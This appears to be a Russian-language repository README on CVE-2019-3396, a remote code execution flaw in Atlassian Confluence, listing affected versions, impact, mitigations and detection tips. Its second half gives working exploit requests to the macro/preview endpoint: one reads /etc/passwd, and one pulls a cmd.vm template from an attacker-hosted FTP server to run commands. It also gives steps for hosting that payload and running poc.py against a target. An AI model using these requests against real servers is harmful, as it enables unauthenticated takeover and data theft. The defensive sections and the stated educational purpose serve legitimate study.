CVE-2019-3396
CVE-2019-3396 — SSTI RCE в Confluence
🔎 Что такое CVE-2019-3396?
- Критическая уязвимость Confluence (Atlassian).
- Тип: инъекция в шаблоны + обход пути.
- Риск: удалённое выполнение кода (RCE) без входа в систему.
- Статус: активно эксплуатируется.
🛑 Затронутые версии
- 6.6.0 → 6.6.11 ❌ уязвима
- 6.6.12 ✅ исправлена
- 6.12.0 → 6.12.2 ❌ уязвима
- 6.12.3 ✅ исправлена
- 6.13.0 → 6.13.2 ❌ уязвима
- 6.13.3 ✅ исправлена
- 6.14.0 → 6.14.1 ❌ уязвима
- 6.14.2 ✅ исправлена
👉 Всегда проверяйте официальные рекомендации Atlassian для получения полной информации.
💥 Воздействие
- Полный захват сервера
- Кража данных, программы-вымогатели, крипто-майнеры
- Атакующие могут выполнять любой код, какой захотят
🔐 Меры защиты
- ✅ Обновите Confluence до исправленной версии (лучшее решение)
- 🚫 Отключите макрос Widget Connector, если не можете сразу установить патч
- 🔒 Ограничьте доступ (только для внутренних сетей, пока не исправлено)
👀 Обнаружение (безопасные советы)
- Следите в логах за странными запросами к конечным точкам macro/preview
- Ищите подозрительные процессы или исходящий трафик
- Используйте сканеры уязвимостей для подтверждения версии
📂 Чтение файла
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
Выполнение команды
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
Автоматизация
- загрузите cmd.vm на ваш VPS
- используйте FTP или HTTPS, чтобы создать ссылку на этот файл cmd.vm через
pip install pyftpdlib
python -m pyftpdlib -p 8888
- обновите файл poc.py, задав новое значение pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ СОВЕТ — этот репозиторий предназначен только для обучения, защиты и повышения осведомлённости.
🔗 Ссылки